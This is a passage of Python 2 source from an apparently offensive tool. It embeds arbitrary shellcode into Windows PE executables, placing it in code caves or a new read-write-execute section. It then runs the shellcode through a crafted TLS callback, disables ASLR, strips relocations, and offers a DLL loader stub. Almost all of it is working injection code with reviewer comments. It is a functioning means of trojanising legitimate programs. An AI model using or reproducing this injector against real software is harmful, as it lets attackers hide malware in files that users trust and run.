    pe.set_dword_at_rva(rva+12,pe.OPTIONAL_HEADER.ImageBase+rva+24)
    print colors.GREEN + "[+] AddressOfCallBacks pointing to the array of callback addresses (va: 0x%x)" % (pe.OPTIONAL_HEADER.ImageBase+rva+24) + colors.RESET
    # Set first pointer of the callbacks array to point to the Shellcode
    pe.set_dword_at_rva(rva+24,pe.OPTIONAL_HEADER.ImageBase+rva+32)
    print colors.GREEN + "[+] First callback entry pointing to the shellcode (va: 0x%x)" % (pe.OPTIONAL_HEADER.ImageBase+rva+32) + colors.RESET
    # Update the IMAGE_DIRECTORY_ENTRY_TLS.
    # Data directory index 9 is IMAGE_DIRECTORY_ENTRY_TLS; 0x18 (24) is the
    # size of IMAGE_TLS_DIRECTORY32.
    pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].VirtualAddress = rva
    pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].Size = 0x18
    print colors.GREEN + "[+] IMAGE_DIRECTORY_ENTRY_TLS updated" + colors.RESET
    print colors.ORANGE + " VirtualAddress: 0x%x " % (pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].VirtualAddress)
    print colors.ORANGE + " Size: 0x%x " % (pe.OPTIONAL_HEADER.DATA_DIRECTORY[9].Size)
def get_codecaves(section,binary,size):
codecaves = []
raw_offset = section.PointerToRawData
length = section.SizeOfRawData
data = binary[raw_offset:raw_offset + length]
offsets = [m.start() for m in re.finditer('\x00'*(size), data)]
if offsets:
print colors.ORANGE + " %d code caves found in %s" % (len(offsets),section.Name) + colors.RESET
codecaves.append(section)
codecaves.append(offsets)
return codecaves
def search_codecaves(sections_org,binary,size):
print colors.GREEN + "[+] Searching code caves (%d bytes) in executable sections..." % (size) + colors.RESET
for section in sections_org[0]:
codecaves = get_codecaves(section,binary,size)
if codecaves:
return codecaves
print colors.FAIL + "[-] Code caves not found in executable sections. Taking a look at others..." + colors.RESET
for section in sections_org[1]:
codecaves = get_codecaves(section,binary,size)
if codecaves:
return codecaves
print colors.FAIL + "[-] Code caves not found in any sections. Taking another approach..." + colors.RESET
# Inject the shellcode in the offset indicated
def inject_shellcode(binary, shellcode, offset_cave):
    """Overwrite len(shellcode) bytes of *binary* at *offset_cave*.

    The shellcode replaces the bytes it covers (it is not inserted), so the
    total length of *binary* is preserved.
    """
    end = offset_cave + len(shellcode)
    return binary[:offset_cave] + shellcode + binary[end:]
def section_manage(pe,shellcode):
    """Fallback path: store the shellcode in a brand-new executable section
    and point the TLS directory at it.

    0xE0000020 = IMAGE_SCN_MEM_EXECUTE | MEM_READ | MEM_WRITE | CNT_CODE.
    """
    create_section(pe,shellcode,0xE0000020)
    # The blob (TLS structure + shellcode) sits at the very start of the new
    # section, i.e. at its VirtualAddress.
    new_section_rva = pe.sections[-1].VirtualAddress
    update_tls_structure(new_section_rva,pe)
def inject_tls(binary,shellcode):
    """Embed *shellcode* in the PE image *binary* and run it via a TLS callback.

    Only handles binaries WITHOUT an existing TLS directory. 32 NULL bytes are
    prepended to the shellcode to hold the IMAGE_TLS_DIRECTORY32 (24 bytes)
    plus a 2-entry callback array (8 bytes); update_tls_structure() fills them
    in. The blob is placed either in a new section (module flag `section`, or
    when no cave is found) or in a NULL-byte code cave of an existing section.
    ASLR is always disabled because the TLS structure stores absolute VAs.
    Reads the module-level flags `section` and `reloc` set by main().
    Returns the modified pefile.PE object.
    """
    print colors.GREEN + "[+] Shellcode size: %s bytes" % len(shellcode) + colors.RESET
    pe = pefile.PE(data=binary)
    if not hasattr(pe, 'DIRECTORY_ENTRY_TLS'):
        print colors.GREEN + "[+] TLS Directory not present" + colors.RESET
        # Add the 32 bytes TLS structure to the shellcode
        shellcode = str('\0'*32) + shellcode
        if section:
            section_manage(pe, shellcode)
        else:
            sections_org = organize_sections(pe.sections)
            codecaves = search_codecaves(sections_org,binary,len(shellcode))
            if codecaves:
                # Get a random offset
                # codecaves is [section_object, list_of_offsets]; pick one cave at random.
                offset = codecaves[1][random.randint(0,len(codecaves[1])-1)]
                raw_offset = codecaves[0].PointerToRawData + offset
                # NOTE(review): assumes the cave offset is also valid in the
                # virtual mapping of the section; a cave located past
                # Misc_VirtualSize (raw slack) would not be mapped at this
                # rva -- worth confirming get_codecaves cannot return such offsets.
                rva = offset + codecaves[0].VirtualAddress
                print colors.GREEN + "[+] Random code cave chosen at raw offset: 0x%x (rva: 0x%x section: %s)" % (raw_offset,rva,codecaves[0].Name) + colors.RESET
                binary = inject_shellcode(binary,shellcode,raw_offset)
                print colors.GREEN + "[+] Code cave injected" + colors.RESET
                # Re-parse so pefile sees the injected bytes.
                pe = pefile.PE(data=binary)
                # Make the host section readable/writable/executable so the
                # TLS callback can run (and self-modify) inside it.
                for n in pe.sections:
                    if n.VirtualAddress == codecaves[0].VirtualAddress:
                        n.Characteristics = 0xE0000020
                        print colors.GREEN + "[+] Characteristics of %s changed to 0xE0000020" % (codecaves[0].Name) + colors.RESET
                        break
                update_tls_structure(rva,pe)
            # Not code caves found
            else:
                section_manage(pe, shellcode)
    # DIRECTORY_ENTRY_TLS present
    else:
        # Patching an existing TLS directory is not implemented yet; the
        # binary is still written out below (only ASLR/reloc tweaks applied).
        print colors.FAIL + "[-] The binary does already have the TLS Directory. I will be updated soon ..." + colors.RESET
    # disable ASLR
    # (the absolute VAs written into the TLS structure are only valid when
    # the image loads at its preferred ImageBase)
    pe.OPTIONAL_HEADER.DllCharacteristics &= ~pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']
    if reloc and pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].VirtualAddress != 0x0:
        # Data directory index 5 is IMAGE_DIRECTORY_ENTRY_BASERELOC; zeroing
        # it (-r flag) prevents the loader from relocating the image.
        pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].VirtualAddress = 0x0
        pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].Size = 0x0
        print colors.GREEN + "[+] IMAGE_DIRECTORY_ENTRY_BASERELOC set to 0x0"
        print colors.ORANGE + " VirtualAddress: 0x%x" % pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].VirtualAddress
        print colors.ORANGE + " Size: 0x%x" % pe.OPTIONAL_HEADER.DATA_DIRECTORY[5].Size + colors.RESET
    return pe
# Command-line flags, set in main():
#   -t -> section: force creation of a new section instead of searching caves.
#   -r -> reloc:   zero the base-relocation directory so the absolute VAs
#                  written into the TLS structure stay valid.
section = False
reloc = False
def main(argv):
    """Parse the command line, build the shellcode and write the patched PE.

    NOTE(review): the *argv* parameter is ignored -- getopt is fed
    sys.argv[1:] directly, so main() cannot be driven programmatically.
    """
    dll = False
    try:
        opts, args = getopt.getopt(sys.argv[1:],"rto:f:s:hl:")
    except getopt.GetoptError as err:
        print colors.FAIL + "Error: %s. Type -h for help" % (str(err)) + colors.RESET
        sys.exit(1)
    for opt, arg in opts:
        # NOTE(review): ("-f") etc. are plain strings, not tuples, so these
        # `opt in (...)` checks are substring tests. They happen to work here
        # because getopt always yields the full option string, but it is a
        # latent pitfall.
        if opt in ("-h","--help"):
            usage()
            sys.exit(1)
        elif opt in ("-f"):
            binary = open_file(arg,"rb")
        elif opt in ("-l"):
            dll = arg
        elif opt in ("-o"):
            output = arg
        elif opt in ("-t"):
            global section
            section = True
        elif opt in ("-r"):
            global reloc
            reloc = True
        elif opt in ("-s"):
            shellcode = open_file(arg,"rb")
    # locals() membership is used to detect whether -f/-s/-o were supplied.
    if 'binary' not in locals():
        usage()
        sys.exit(1)
    if 'shellcode' not in locals() and not dll:
        print colors.FAIL + "[!] You must supply a shellcode file or the LoadLibrary payload\n" + colors.RESET
        sys.exit(1)
    banner()
    if dll:
        # 24-byte stub beginning with "MZ" that overlays the DLL's DOS header:
        # call/pop to get the current address into EBX, add a patched offset,
        # then call through EBX. The 0xDEADBEEF placeholder is replaced below.
        loader = "\x4D\x5A\xE8\x00\x00\x00\x00\x5B\x52\x45\x55\x89\xE5\x81\xC3\xEF\xBE\xAD\xDE\xFF\xD3\xC2\x0C\x00"
        dll = pefile.PE(dll)
        # File offset of the DLL's first exported symbol; -7 compensates for
        # the stub bytes executed before the pop (presumably -- confirm
        # against the stub's disassembly).
        addr = dll.get_offset_from_rva(dll.DIRECTORY_ENTRY_EXPORT.symbols[0].address)
        addr = addr - 7
        addr = struct.pack("<I", addr)
        loader = loader.replace("\xEF\xBE\xAD\xDE", addr)
        size = len(loader)
        # The stub replaces the first len(loader) bytes of the DLL image, so
        # the resulting blob is both a runnable shellcode and the DLL itself.
        shellcode = loader + dll.__data__[size:]
    pe = inject_tls(binary,shellcode)
    if 'output' not in locals():
        output = "tls_injected.exe"
    pe.write(filename=output)
    print colors.BOLD + "[+] Injection completed: %s (%d bytes)" % (output,os.path.getsize(output)) + colors.RESET
# Script entry point (note: the argv argument is currently ignored by main()).
if __name__ == '__main__':
    main(sys.argv[1:])
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.